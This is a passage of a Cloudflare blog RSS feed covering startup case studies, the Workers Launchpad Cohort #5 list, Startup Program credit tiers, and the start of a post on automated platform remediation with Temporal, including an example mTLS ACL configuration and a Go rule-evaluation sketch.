webhooks and coordinating distributed processes, both essential for maintaining system consistency and reliability at scale. While Workers handle sync requests at point of execution, longer running jobs process via Queues. For example, during a scheduled ETL sync, new data records generated are stored as a message queue on Cloudflare <a href="https://developers.cloudflare.com/pub-sub/"><b><u>Pub/Sub</u></b></a>. 
A consumer Worker collects these messages and makes an API request to the pod using the Workers Queue. The consumer Worker consumes more messages as each queue is finished processing.</p><p>Another example of where this has been optimal is for managing AI workflows. Many AI workflows involve concurrent requests to multiple data sources; Queues <a href="https://www.cloudflare.com/learning/ai/how-to-build-rag-pipelines/">streamlines data processing and efficiently feeds information</a> into customers’ <a href="https://www.cloudflare.com/learning/ai/retrieval-augmented-generation-rag/"><u>Retrieval Augmented Generation (RAG)</u></a> workflows. This approach smooths out workload spikes, reduces bottlenecks, and ensures that AI agents can reliably aggregate and process data without delays.</p><p>Beyond this, Lamatic.ai offers <b>Workers AI</b> as one of the supported inference providers that customers can use across their platform. Customers can choose to run one of the many open source models hosted on Workers AI, depending on their use case (chatbot, image generation, voice, etc.). Together, these layers solve the challenges of scaling AI agents by handling high volumes of data, maintaining low-latency responses, and ensuring robust security. With Cloudflare’s infrastructure as its backbone, Lamatic.ai has built a resilient and high-performing platform that meets the rigorous demands of modern AI applications, making it an ideal choice for startups embedding AI-driven features into their products.</p>
    <div>
      <h2>Skyward AI automates compliance using AI agents with Durable Objects and <code>agents</code></h2>
      <a href="#skyward-ai-automates-compliance-using-ai-agents-with-durable-objects-and-agents">
        
      </a>
    </div>
    <p>Skyward AI is transforming compliance operations by leveraging Cloudflare’s serverless computing capabilities to build AI-driven compliance agents that streamline critical tasks like evidence collection, real-time risk analysis, and policy updates. Compliance teams in fintech, supply chain, and other highly regulated industries use these AI Agents to extract and organize evidence, provide real-time recommendations, and orchestrate policy and procedural updates automatically. By handling document parsing, risk monitoring, and policy enforcement, these AI Agents reduce the risk of human error while allowing compliance professionals to focus on high-value tasks.</p><p>Skyward has built an AI agents platform designed with a serverless-first approach, avoiding the constraints of centralized cloud computing. To achieve this, the company leverages Cloudflare’s Developer Platform to create and maintain a highly responsive and scalable infrastructure. <b>Workers</b> handle incoming requests like chat inputs, compliance checks, or authentication, and route them efficiently across multiple geographies. Skyward initially built their AI agents infrastructure using <a href="https://developers.cloudflare.com/durable-objects/"><b><u>Durable Objects</u></b></a>,<b> </b><a href="https://developers.cloudflare.com/workflows/"><b><u>Workflows</u></b></a> and JavaScript-native RPC for AI coordination, but has recently transitioned to Cloudflare’s <a href="https://blog.cloudflare.com/build-ai-agents-on-cloudflare/"><u>new AI agents framework</u></a>. Given that <code>agents </code>provides a framework for building and orchestrating AI agents, the migration has helped Skyward abstract the need to manage Durable Objects manually, significantly reducing time spent on managing these tools. 
Although this release is fairly recent, the transition has simplified the way agents communicate while preserving the benefits of their original design, like data privacy, isolation, and concurrency management. This has also made it easier to provide real-time feedback and responses to their end users.</p><p>Skyward optimizes real-time compliance automation by achieving sub-100 ms response times for AI agent queries. Workloads are structured to minimize unnecessary network round-trips, and a sync-engine approach proactively preloads and pushes data to clients, delivering a highly responsive user experience. To proxy AI inference, Skyward uses <a href="https://developers.cloudflare.com/ai-gateway/"><b><u>AI Gateway</u></b></a> to provide observability into usage, performance, and costs across multiple vendors, improving their AI operational efficiency. Leveraging Cloudflare’s serverless Developer Platform has allowed Skyward to simplify their architecture while supporting global availability, avoiding the need for Kubernetes clusters or complex locking mechanisms. The team also avoids the burden of managing regional deployments, as Cloudflare’s multi-region support ensures consistent performance worldwide without added operational complexity.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/IW8Nh4NECUH897s3OEETe/6e3823712b3fceca699c068605aa9092/2.png" />
          </figure><p>State management is a critical component to execute agentic workflows. Each compliance session runs within a dedicated <b>Durable Object</b>, which keeps relevant data close to the execution layer. This setup minimizes database round-trips and ensures that tasks like Anti-Money Laundering (AML) checks, Know Your Business (KYB) validation, and document processing remain efficient. Once a compliance session is complete, the system summarizes and stores the relevant information in Postgres and <b>R2</b>, optimizing memory usage without requiring persistent cloud infrastructure.</p><p>To balance low-latency operations with long-term storage, Skyward employs a multi-layered data management strategy. The Skyward team, using <a href="https://developers.cloudflare.com/hyperdrive/"><b><u>Hyperdrive</u></b></a>, has been able to reduce query latency by nearly 50%, allowing compliance teams to receive immediate feedback. At the company's core, Skyward’s goal is to offer a platform that is "streamlined for compliance teams”. The team maintains that a speedy feedback loop ensures end customers get the data and responses needed to act. Whether there's one agent or hundreds of agents processing tasks in parallel, Hyperdrive ensures that database requests to assets like extensive company documentation (i.e. regulations, policies, procedures, internal documents), complex regulatory knowledge graphs, and on-demand context information for conversational workflows are all as performant as possible.</p><p><b>Durable Objects</b> facilitate real-time session state, ensuring AI agents function smoothly without complex locking mechanisms. For larger compliance-related documents, such as legal PDFs and archived data, Cloudflare <a href="https://developers.cloudflare.com/r2/"><b><u>R2</u></b></a> provides long-term storage, ensuring only frequently accessed information remains readily available. 
This approach enhances performance while keeping storage management efficient and cost-effective.</p><p>Security and scalability remain priorities for compliance-focused AI applications. Skyward enforces strict access controls, ensuring that only authorized users can access development and production environments. Each AI session maintains an auditable log of key events, user actions, and approvals, supporting the ability to export these insights for compliance and legal requirements. Because each agent is deployed in its own instance and has its own database, Skyward ensures that there is a detailed record of every required user, agent interaction, and auditing requirements. On top of this, the ability to deploy and scale globally with Cloudflare’s network has allowed Skyward to maintain consistent, high-performance operations across multiple regions without extensive infrastructure overhead.</p><p>Looking ahead, Skyward plans to further enhance AI agent responsiveness by running select models directly on <b>Cloudflare Workers AI</b>, reducing reliance on external inference providers. The team plans to further integrate <a href="https://developers.cloudflare.com/cloudflare-for-platforms/workers-for-platforms/"><b><u>Workers for Platforms</u></b></a> in an effort to better isolate customer data and workflows, giving end users greater control over their compliance automation. As Cloudflare continues to evolve its AI capabilities, Skyward aims to push the boundaries of distributed AI compliance solutions, making regulatory adherence more automated, scalable, and secure.</p>
    <div>
      <h2>Building on Cloudflare</h2>
      <a href="#building-on-cloudflare">
        
      </a>
    </div>
    <p>We’re inspired by how startups like Lamatic AI and Skyward AI are building their AI agent platforms on Cloudflare. This kind of innovation is why we’re proud to see so many startups trust Cloudflare for a scalable, reliable, and efficient foundation. </p><p>We’re also thrilled to share that both Lamatic AI and Skyward AI have been invited to join Cloudflare’s upcoming Workers Launchpad Cohort #5. Speaking of Workers Launchpad, it’s been a few months since our last update — let’s take a look at what’s new.</p>
    <div>
      <h2>Thank you to Workers Launchpad Cohort #4, and a warm welcome to Cohort #5</h2>
      <a href="#thank-you-to-workers-launchpad-cohort-4-and-a-warm-welcome-to-cohort-5">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/52soEAD02j2yywLaDkz7Jv/76bad474948e946fccf845bcda5ed801/3.png" />
          </figure><p>The Workers Launchpad team is blown away by what customers are demonstrating on the Developer Platform. Members of Cohort #4 presented at our bi-annual <a href="https://cloudflare.tv/shows/workers-launchpad-demo-day/workers-launchpad-demo-day-cohort-4/QgLLnBg1"><u>Demo Day</u></a>. We had customers demonstrate what they’re building across a multitude of industries, including (of course) AI / ML, developer tools, 3D design, cloud infrastructure, adtech, media, and beyond. It’s incredibly encouraging to see what all these amazing companies are building on the Cloudflare network, and we look forward to continuing to partner with them throughout their startup journey.</p><p>Following the Demo Day for Workers Launchpad Cohort #4, we’ve seen the largest influx of applications from startups across the globe eager to join Cohort #5. This next wave of founders is pushing the boundaries of what’s possible, building in areas like AI agents, developer tooling, <a href="https://www.cloudflare.com/learning/ai/what-is-model-context-protocol-mcp/">MCP</a>, media, and beyond. With each new cohort, we’re continually inspired by the caliber of founding teams, the bold ideas they bring to life, and the real-world problems they’re tackling with technology.</p><p>Help us give some love and a warm welcome to the participants of Cohort #5:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1RIIq1qTdmBeqeJS7ZoOKh/d65f0cf2c1bb66bdc2f5658b41ad8112/4.png" />
          </figure><p>We can’t wait to share more about what Cohort #5 achieves. Be sure to follow <a href="https://x.com/CloudflareDev"><u>@CloudflareDev</u></a> on X and join our <a href="https://discord.com/invite/cloudflaredev?cf_target_id=4874A68FFE682C2DFA5CB8063B4025ED"><u>Developer Discord</u></a> server to hear updates on the cohorts.</p><p>If you’re developing your application on our Developer Platform, we’d love to learn how Cloudflare is powering your journey. Please <a href="https://docs.google.com/forms/d/e/1FAIpQLSeIZmgY5ste4LZi-hNaJzbXHBbeD2DHWe8R2xxp0wKO0byRYA/viewform"><u>share more</u></a> about what you’re building, and our team will be sure to review your submission. And if you’re a startup and interested in joining Workers Launchpad, feel free to <a href="https://www.cloudflare.com/lp/workers-launchpad/"><u>apply for Cohort 6</u></a> — applications are now open!</p><table><tr><td><p><b>Company</b></p></td><td><p><b>About</b></p></td></tr><tr><td><p><a href="https://www.acemate.ai"><b>Acemate</b></a></p></td><td><p>AI learning platform for university students and educators</p></td></tr><tr><td><p><a href="http://www.centillion.ai"><b>Centillion AI</b></a></p></td><td><p>Building an MCP for identity verification &amp; fraud prevention</p></td></tr><tr><td><p><a href="https://dreamlit.ai/"><b>Dreamlit AI</b></a></p></td><td><p>Add transactional notifications into your app in minutes with no engineers required</p></td></tr><tr><td><p><a href="http://www.ductize.com"><b>Ductize</b></a></p></td><td><p>Productize your service and launch your website with integrated payments within 30 minutes</p></td></tr><tr><td><p><a href="http://www.firmly.ai"><b>Firmly</b></a></p></td><td><p>Agentic commerce platform that enables consumers to shop at the moment of inspiration</p></td></tr><tr><td><p><a href="http://www.heartspace.ai"><b>Heartspace</b></a></p></td><td><p>Deliver quality PR on demand: pay for placements, not retainers</p></td></tr><tr><td><p><a 
href="http://www.lamatic.ai"><b>Lamatic</b></a></p></td><td><p>Managed AI middleware and IDE to embed AI features quickly and reliably</p></td></tr><tr><td><p><a href="http://lu.ma"><b>Lu.ma</b></a></p></td><td><p>Application that makes it easy to host great events</p></td></tr><tr><td><p><a href="http://www.manticore.ai"><b>Manticore</b></a></p></td><td><p>AI-driven penetration testing: identify, remediate, and retest on-demand</p></td></tr><tr><td><p><a href="http://mc2.fi"><b>MC</b></a><a href="https://mc2finance.com/about-mc-">²</a><a href="http://mc2.fi"><b> Finance</b></a></p></td><td><p>Crowdsource DeFi strategies and list them as ETFs</p></td></tr><tr><td><p><a href="http://muppet.dev"><b>Muppet</b></a></p></td><td><p>Platform for building and managing MCPs at scale</p></td></tr><tr><td><p><a href="http://www.navatech.ai"><b>Navatech</b></a></p></td><td><p>Remove barriers to language, access, and modality for frontline workers</p></td></tr><tr><td><p><a href="https://era.new/"><b>New Era</b></a></p></td><td><p>Craft beautiful emails using natural language</p></td></tr><tr><td><p><a href="http://www.newharbor.co"><b>New Harbor</b></a></p></td><td><p>Simple, friendly, all-in-one cybersecurity for organizations</p></td></tr><tr><td><p><a href="https://nexartis.com/"><b>Nexartis</b></a></p></td><td><p>Enable new paths for rights management, protect intellectual property, and properly monetize individual contributions</p></td></tr><tr><td><p><a href="http://www.nordcraft.com"><b>Nordcraft</b></a></p></td><td><p>Web development engine that lets product teams build beautiful interactive web applications</p></td></tr><tr><td><p><a href="http://www.periculum.io"><b>Periculum</b></a></p></td><td><p>AI provider offering data analytics software solutions to organizations in underserved markets</p></td></tr><tr><td><p><a href="http://pressbox.studio/"><b>Pressbox</b></a></p></td><td><p>AI-powered multi-modal content personalization for sports and media 
organizations</p></td></tr><tr><td><p><a href="http://www.prompteus.com"><b>Prompteus</b></a></p></td><td><p>Guardrails, logging, and cost reduction for AI integrations</p></td></tr><tr><td><p><a href="https://remixlabs.com/"><b>Remix Labs</b></a></p></td><td><p>Enable next-gen digital engagement with agentic app experiences</p></td></tr><tr><td><p><a href="http://www.skyward.ai"><b>Skyward</b></a></p></td><td><p>The AI-native workspace for compliance teams</p></td></tr><tr><td><p><a href="http://www.usesonora.com"><b>Sonora</b></a></p></td><td><p>AI-native customer intelligence platform that synthesizes customer feedback and delivers actionable insights across all communication channels</p></td></tr><tr><td><p><a href="https://ssojet.com/"><b>SSOJet</b></a></p></td><td><p>Intelligent enterprise SSO that just works</p></td></tr><tr><td><p><a href="http://syrenn.co"><b>Syrenn</b></a></p></td><td><p>AI outbound sales-coaching platform</p></td></tr><tr><td><p><a href="http://testdriver.ai"><b>Testdriver</b></a></p></td><td><p>Increase test coverage with Computer-Use agents</p></td></tr><tr><td><p><a href="http://www.toolhouse.ai"><b>Toolhouse</b></a></p></td><td><p>Platform that enables any developer to build AI agents and workflows with a great developer experience</p></td></tr><tr><td><p><a href="http://www.unravo.org"><b>Unravo</b></a></p></td><td><p>Agentic AI-powered, end-to-end business research platform</p></td></tr><tr><td><p><a href="http://wittify.ai"><b>Wittify.ai</b></a></p></td><td><p>Advanced Arabic conversational AI for customer engagement activities</p></td></tr><tr><td><p><a href="http://actualize.zerosumdefense.io"><b>Zero Sum Defense</b></a></p></td><td><p>Digital freedom through tailored security and privacy</p></td></tr></table>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/40boL9159chHNCBcqOccse/96aae4b197042500da8a78b172db0cf0/5.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Workers Launchpad]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <guid isPermaLink="false">44H31LjCVMieZ4K7wqlLaj</guid>
            <dc:creator>Christopher Rotas</dc:creator>
        </item>
        <item>
            <title><![CDATA[Startup Program update: empowering every stage of the startup journey]]></title>
            <link>https://blog.cloudflare.com/expanding-cloudflares-startup-program/</link>
            <pubDate>Fri, 11 Apr 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare’s Startup Program offers up to $250,000 in credits for companies building on our Developer Platform across 4 tiers: $5,000, $25,000, $100,000, and $250,000. ]]></description>
            <content:encoded><![CDATA[ <p>During Cloudflare’s Birthday Week in September 2024, we <a href="https://blog.cloudflare.com/startup-program-250k-credits/"><u>introduced</u></a> a revamped Startup Program designed to make it easier for startups to adopt Cloudflare through a new credits system. This update focused on better aligning the program with how startups and developers actually consume Cloudflare, by providing them with clearer insight into their projected usage, especially as they approach graduation from the program.</p><p>Today, we’re excited to announce an expansion to that program: new credit tiers that better match startups at every stage of their journey. But before we dive into what’s new, let’s take a quick look at what the Startup Program is and why it exists.</p>
    <div>
      <h2>A refresher: what is the Startup Program?</h2>
      <a href="#a-refresher-what-is-the-startup-program">
        
      </a>
    </div>
    <p>Cloudflare for Startups provides credits to help early-stage companies build the next big idea on our platform. Startups accepted into the program receive credits valid for one year or until they’re fully used, whichever comes first.</p><p>Beyond credits, the program includes access to up to three domains with enterprise-level services, giving startups the same advanced tools we provide to large companies to protect and accelerate their most critical applications.</p><p>We know that building a startup is expensive, and Cloudflare is uniquely positioned to support the full-stack needs of modern applications. Our goal is simple: ensure that you have access to the best of Cloudflare’s global network, without the barriers of cost or availability.</p><p>Since launching the revamped credits system in September, we’ve learned a lot from the startups in our program, including what they’re building, what they need, and where they need more flexibility. One of the most common requests was more credit tier options.</p><p>That’s why we’re introducing new tiers that provide even more options to startups as they scale.</p>
    <div>
      <h2>Introducing additional credit tiers</h2>
      <a href="#introducing-additional-credit-tiers">
        
      </a>
    </div>
    <p>The Cloudflare for Startups Program now offers four credit tiers: </p><table><tr><td><p><b>Credit Amount</b></p></td><td><p><b>$5,000</b></p></td><td><p><b>$25,000</b></p></td><td><p><b>$100,000</b></p></td><td><p><b>$250,000</b></p></td></tr><tr><td><p><b>Stage</b></p></td><td><p>Bootstrapped, stealth startups</p></td><td><p>Up-and-coming startups</p></td><td><p>Seed-funded startups</p></td><td><p>Tier 1 startups</p></td></tr><tr><td><p><b>Description</b></p></td><td><p>For startups who are just getting started. This tier is great for building, testing, and iterating your product.</p></td><td><p>For startups with early adopters and proving product market fit.</p></td><td><p>For startups that have raised capital, and are experiencing high growth.</p></td><td><p>For scaling startups that belong to our Tier 1 VC and accelerator network, are building a mission-critical AI application, or are participating in our <a href="https://www.cloudflare.com/lp/workers-launchpad/"><u>Workers Launchpad</u></a> Program.</p></td></tr><tr><td><p><b>Criteria</b></p></td><td><p>Building a software-based product or service</p><p>Founded in the last 5 years</p><p>Valid and matching email address</p></td><td><p><b>$5,000 criteria plus:</b></p><p>
</p><p>Active LinkedIn</p><p>Funded up to $1M</p></td><td><p><b>$25,000 criteria plus:</b></p><p>
</p><p>Funded between $1M and $5M</p><p>Belong to any of our 250+ approved VC or Accelerator partners</p></td><td><p><b>$100,000 criteria plus:</b></p><p>
</p><p>High growth / AI companies, <b>OR</b></p><p>Tier 1 VC &amp; Accelerators</p></td></tr></table><p>These tiers are designed to offer simplicity and clarity by aligning with where you are in your growth journey. (You can check out eligibility criteria and apply to the Startup Program <a href="https://www.cloudflare.com/forstartups/?utm_medium=referral&amp;utm_source=partner&amp;utm_campaign=2024-q4-dev-gbl-developers-ge-ge-general-pay_devweek25"><u>here</u></a>). These tiers are still subject to the same Cloudflare for Startups Terms of Service. Credits are valid for up to one year or when all credits are consumed (whichever comes first).</p>
    <div>
      <h2>Why are we adding additional credit tiers?</h2>
      <a href="#why-are-we-adding-additional-credit-tiers">
        
      </a>
    </div>
    <p>We understand that each startup may have different needs depending on where they’re at in their journey. Some are just getting off the ground, others are scaling rapidly, and each has unique infrastructure needs. With this expansion, we’re reaffirming Cloudflare’s commitment to startups of all sizes, making it easier for you to access the right level of support and resources, exactly when you need them.</p><p>Whether you're launching your MVP or preparing for your next funding round, Cloudflare is here to help you grow.</p>
    <div>
      <h2>What can I use the credit tiers for?</h2>
      <a href="#what-can-i-use-the-credit-tiers-for">
        
      </a>
    </div>
    <p>The vast majority of Cloudflare products (including all products found on the pay-as-you-go plans) can be used on the Startup Program. Beyond going to the <a href="http://www.cloudflare.com/forstartups"><u>website</u></a> to see what products are included, below are a few examples of what you can use your credits for:  </p><p><b>Build AI applications</b></p><p>Store your training data in <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>R2</u></a>, build AI-powered agents (via <a href="https://developers.cloudflare.com/agents/api-reference/"><u>Agents SDK</u></a>) that autonomously perform tasks with <a href="https://www.cloudflare.com/developer-platform/products/durable-objects/"><u>Durable Objects</u></a> and <a href="https://www.cloudflare.com/developer-platform/products/workers/"><u>Workers</u></a>, or use one of over <a href="https://developers.cloudflare.com/workers-ai/models/"><u>50 models</u></a> to run inference tasks on Cloudflare’s global network.  </p><a href="https://deploy.workers.cloudflare.com/?url=https://github.com/cloudflare/agents-starter">
<img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p><p><b>Create immersive realtime experiences</b></p><p>Deliver live audio and video via our <a href="https://www.cloudflare.com/developer-platform/products/cloudflare-calls/"><u>Realtime Kit</u></a>, enhance the experience with an AI-powered chatbot running on <a href="https://www.cloudflare.com/developer-platform/products/workers-ai/"><u>Workers AI</u></a> to transcribe the call, and broadcast to large audiences with <a href="https://www.cloudflare.com/developer-platform/products/cloudflare-stream/"><u>Stream</u></a>.  </p><p><b>Build durable multi-step applications</b></p><p>Design and run long-lived, multi-step processes like onboarding flows, document processing, or order fulfillment. Use <a href="https://developers.cloudflare.com/workflows/"><u>Workflows</u></a> to coordinate logic across Workers, Durable Objects, <a href="https://developers.cloudflare.com/queues/"><u>Queues</u></a>, and AI tasks. Easily handle retries, timeouts, and state management without complex orchestration infrastructure.</p>
    <div>
      <h2>What are startups saying about Cloudflare?</h2>
      <a href="#what-are-startups-saying-about-cloudflare">
        
      </a>
    </div>
    
    <div>
      <h3>Webstudio’s no-code platform is powered by Cloudflare’s Developer Platform</h3>
      <a href="#webstudios-no-code-platform-is-powered-by-cloudflares-developer-platform">
        
      </a>
    </div>
    <blockquote><p>"From a modern design tool, you'd expect real-time collaborative features and would like to have resources as close to users as possible. Since betting on the Developer Platform architecture, Cloudflare has done more for us than any other vendor out there!" - Oleg Isonen (Founder &amp; CEO)</p></blockquote>
    <div>
      <h3>GrackerAI’s cybersecurity research engine runs on Cloudflare’s AI and serverless architecture</h3>
      <a href="#grackerais-cybersecurity-research-engine-runs-on-cloudflares-ai-and-serverless-architecture">
        
      </a>
    </div>
    <blockquote><p>“Cloudflare’s fusion of edge computing and AI empowers developers to deploy and utilize AI models with unprecedented efficiency and scale, marking a significant leap forward in how we build and interact with intelligent systems.” - Deepak Gupta (Co-founder &amp; CEO)</p></blockquote>
    <div>
      <h3>Render Better powers faster ecommerce experiences with Cloudflare Workers</h3>
      <a href="#render-better-powers-faster-ecommerce-experiences-with-cloudflare-workers">
        
      </a>
    </div>
    <blockquote><p>"Each month Render Better optimizes billions of monthly requests for ecommerce visitors, delivering faster loading sites that make top brands millions more in revenue. We're able to scale up with Cloudflare's serverless workers, handling every request at the network edge within milliseconds, thanks to the rock solid, DX-friendly scope of the Developer Platform." -  James Koshigoe (Co-founder &amp; CEO)</p></blockquote>
    <div>
      <h2>What will you build on Cloudflare? </h2>
      <a href="#what-will-you-build-on-cloudflare">
        
      </a>
    </div>
    <p>We can’t wait to see what you will build on Cloudflare. <a href="https://www.cloudflare.com/forstartups/"><u>Apply here</u></a> to take advantage of the Cloudflare for Startups Program.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4kpJ5k3dobY8IscTGoxi7u/2bf888052df84772ece9d9858591329d/image1.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Cloudflare for Startups]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Startup Enterprise Plan]]></category>
            <guid isPermaLink="false">5ojXWmlREPcudSVM0TNmZk</guid>
            <dc:creator>Christopher Rotas</dc:creator>
            <dc:creator>Melissa Kargiannakis</dc:creator>
        </item>
        <item>
            <title><![CDATA[Improving platform resilience at Cloudflare through automation]]></title>
            <link>https://blog.cloudflare.com/improving-platform-resilience-at-cloudflare/</link>
            <pubDate>Wed, 09 Oct 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ We realized that we need a way to automatically heal our platform from an operations perspective, and designed and built a workflow orchestration platform to provide these self-healing capabilities   ]]></description>
<content:encoded><![CDATA[ <p>Failure is an expected state in production systems, and no predictable failure of either software or hardware components should result in a negative experience for users. The exact failure mode may vary, but certain remediation steps must be taken after detection. A common example is when an error occurs on a server, rendering it unfit for production workloads, and requiring action to recover.</p><p>When operating at Cloudflare’s scale, it is important to ensure that our platform is able to recover from faults seamlessly. It can be tempting to rely on the expertise of world-class engineers to remediate these faults, but this would be manual, repetitive, unlikely to produce enduring value, and would not scale. In one word: toil; not a viable solution at our scale and rate of growth.</p><p>In this post we discuss how we built the foundations to enable a more scalable future, and what problems it has immediately allowed us to solve.</p>
    <div>
      <h2>Growing pains</h2>
      <a href="#growing-pains">
        
      </a>
    </div>
    <p>The Cloudflare <a href="https://en.wikipedia.org/wiki/Site_reliability_engineering"><u>Site Reliability Engineering (SRE)</u></a> team builds and manages the platform that helps product teams deliver our extensive suite of offerings to customers. One important component of this platform is the collection of servers that power critical products such as Durable Objects, Workers, and DDoS mitigation. We also build and maintain foundational software services that power our product offerings, such as configuration management, provisioning, and IP address allocation systems.</p><p>As part of tactical operations work, we are often required to respond to failures in any of these components to minimize impact to users. Impact can vary from lack of access to a specific product feature, to total unavailability. The level of response required is determined by the priority, which is usually a reflection of the severity of impact on users. Lower-priority failures are more common — a server may run too hot, or experience an unrecoverable hardware error. Higher-priority failures are rare and are typically resolved via a well-defined incident response process, requiring collaboration with multiple other teams.</p><p>The commonality of lower-priority failures makes it obvious when the response required, as defined in runbooks, is “toilsome”. To reduce this toil, we had previously implemented a plethora of solutions to automate runbook actions such as manually-invoked shell scripts, cron jobs, and ad-hoc software services. These had grown organically over time and provided solutions on a case-by-case basis, which led to duplication of work, tight coupling, and lack of context awareness across the solutions.</p><p>We also care about how long it takes to resolve any potential impact on users. A resolution process which involves the manual invocation of a script relies on human action, increasing the Mean-Time-To-Resolve (MTTR) and leaving room for human error. 
This risks increasing the number of errors we serve to users and degrading trust.</p><p>These problems proved that we needed a way to automatically heal these platform components. This especially applies to our servers, for which failure can cause impact across multiple product offerings. While we have <a href="https://blog.cloudflare.com/unimog-cloudflares-edge-load-balancer"><u>mechanisms to automatically steer traffic away</u></a> from these degraded servers, in some rare cases the breakage is sudden enough to be visible.</p>
    <div>
      <h2>Solving the problem</h2>
      <a href="#solving-the-problem">
        
      </a>
    </div>
<p>To provide a more reliable platform, we needed a new component that provides a common ground for remediation efforts. This would remove duplication of work, provide unified context-awareness, and increase development speed, which ultimately saves hours of engineering time and effort.</p><p>A good solution would do more than let the SRE team auto-remediate; it would empower the entire company. The key to adding self-healing capability was a generic interface for all teams to self-service and quickly remediate failures at various levels: machine, service, network, or dependencies.</p><p>A good way to think about auto-remediation is in terms of workflows. A workflow is a sequence of steps to get to a desired outcome. This is not dissimilar to a manual shell script which executes what a human would otherwise do via runbook instructions. Because of this logical fit with workflows and durable execution, we decided to adopt an open-source platform called <a href="https://github.com/temporalio/temporal"><u>Temporal</u></a>. </p><p>The concept of durable execution is useful for gracefully managing infrastructure failures such as network outages and transient failures in external service endpoints. This capability meant we only needed to build a way to schedule “workflow” tasks and have the code provide reliability guarantees by default, using Temporal. This allowed us to focus on building out the orchestration system to support the control and flow of workflow execution in our data centers. </p><p><a href="https://learn.temporal.io/getting_started/go/first_program_in_go/"><u>Temporal’s documentation</u></a> provides a good introduction to writing Temporal workflows.</p>
    <div>
      <h2>Building an Automatic Remediation System</h2>
      <a href="#building-an-automatic-remediation-system">
        
      </a>
    </div>
    <p>Below, we describe how our automatic remediation system works. It is essentially a way to schedule tasks across our global network with built-in reliability guarantees. With this system, teams can serve their customers more reliably. An unexpected failure mode can be recognized and immediately mitigated, while the root cause can be determined later via a more detailed analysis.</p>
    <div>
      <h3>Step one: we need a coordinator</h3>
      <a href="#step-one-we-need-a-coordinator">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/FOpkEE13QcgwHJ9vhcIZj/5b0c5328ee5326794329a4a07c5db065/Building_on_Temporal_process.png" />
          </figure><p>After our initial testing of Temporal, it was now possible to write workflows. But we needed a way to schedule workflow tasks from other internal services. The coordinator was built to serve this purpose, and became the primary mechanism for the authorisation and scheduling of workflows. </p><p>The most important roles of the coordinator are authorisation, workflow task routing, and safety constraints enforcement. Each consumer is authorized via <a href="https://www.cloudflare.com/learning/access-management/what-is-mutual-tls/"><u>mTLS authentication</u></a>, and the coordinator uses an ACL to determine whether to permit the execution of a workflow. An ACL configuration looks like the following example.</p>
            <pre><code>server_config {
    enable_tls = true
    [...]
    route_rule {
      name  = "global_get"
      method = "GET"
      route_patterns = ["/*"]
      uris = ["spiffe://example.com/worker-admin"]
    }
    route_rule {
      name = "global_post"
      method = "POST"
      route_patterns = ["/*"]
      uris = ["spiffe://example.com/worker-admin"]
      allow_public = true
    }
    route_rule {
      name = "public_access"
      method = "GET"
      route_patterns = ["/metrics"]
      uris = []
      allow_public = true
      skip_log_match = true
    }
}
</code></pre>
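<p>To make the rule semantics concrete, here is a hypothetical Go sketch of how a coordinator might evaluate such rules against an incoming request. The <code>routeRule</code> type, the trailing-wildcard matching, and the <code>authorize</code> helper are illustrative assumptions for this post, not Cloudflare’s actual implementation:</p>

```go
package main

import (
	"fmt"
	"strings"
)

// routeRule mirrors the shape of a route_rule entry from the ACL
// configuration above (field names are illustrative).
type routeRule struct {
	name        string
	method      string
	patterns    []string
	uris        []string // permitted SPIFFE IDs from mTLS client certs
	allowPublic bool
}

// matches reports whether a request path matches a pattern,
// supporting a trailing "/*" wildcard as in the example config.
func matches(pattern, path string) bool {
	if strings.HasSuffix(pattern, "/*") {
		return strings.HasPrefix(path, strings.TrimSuffix(pattern, "*"))
	}
	return pattern == path
}

// authorize returns the first rule permitting the request, or nil if
// no rule allows it. callerURI is the SPIFFE ID extracted from the
// caller's mTLS certificate.
func authorize(rules []routeRule, method, path, callerURI string) *routeRule {
	for i := range rules {
		r := &rules[i]
		if r.method != method {
			continue
		}
		matched := false
		for _, p := range r.patterns {
			if matches(p, path) {
				matched = true
				break
			}
		}
		if !matched {
			continue
		}
		if r.allowPublic {
			return r
		}
		for _, u := range r.uris {
			if u == callerURI {
				return r
			}
		}
	}
	return nil
}

func main() {
	rules := []routeRule{
		{name: "global_get", method: "GET", patterns: []string{"/*"}, uris: []string{"spiffe://example.com/worker-admin"}},
		{name: "public_access", method: "GET", patterns: []string{"/metrics"}, allowPublic: true},
	}
	if r := authorize(rules, "GET", "/workflows/reboot", "spiffe://example.com/worker-admin"); r != nil {
		fmt.Println("allowed by", r.name)
	}
	if r := authorize(rules, "GET", "/metrics", "spiffe://anonymous"); r != nil {
		fmt.Println("allowed by", r.name)
	}
}
```

<p>Note that an unauthenticated caller still reaches <code>/metrics</code> through the <code>allow_public</code> rule, while every other route requires a matching SPIFFE ID.</p>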
            <p>Each workflow specifies two key characteristics: where to run the tasks and the safety constraints, using an <a href="https://github.com/hashicorp/hcl"><u>HCL</u></a> configuration file. Example constraints could be whether to run on only a specific node type (such as a database), or if multiple parallel executions are allowed: if a task has been triggered too many times, that is a sign of a wider problem that might require human intervention. The coordinator uses the Temporal <a href="https://docs.temporal.io/visibility"><u>Visibility API</u></a> to determine the current state of the executions in the Temporal cluster.</p><p>An example of a configuration file is shown below:</p>
            <pre><code>task_queue_target = "&lt;target&gt;"

# The following entries will ensure that
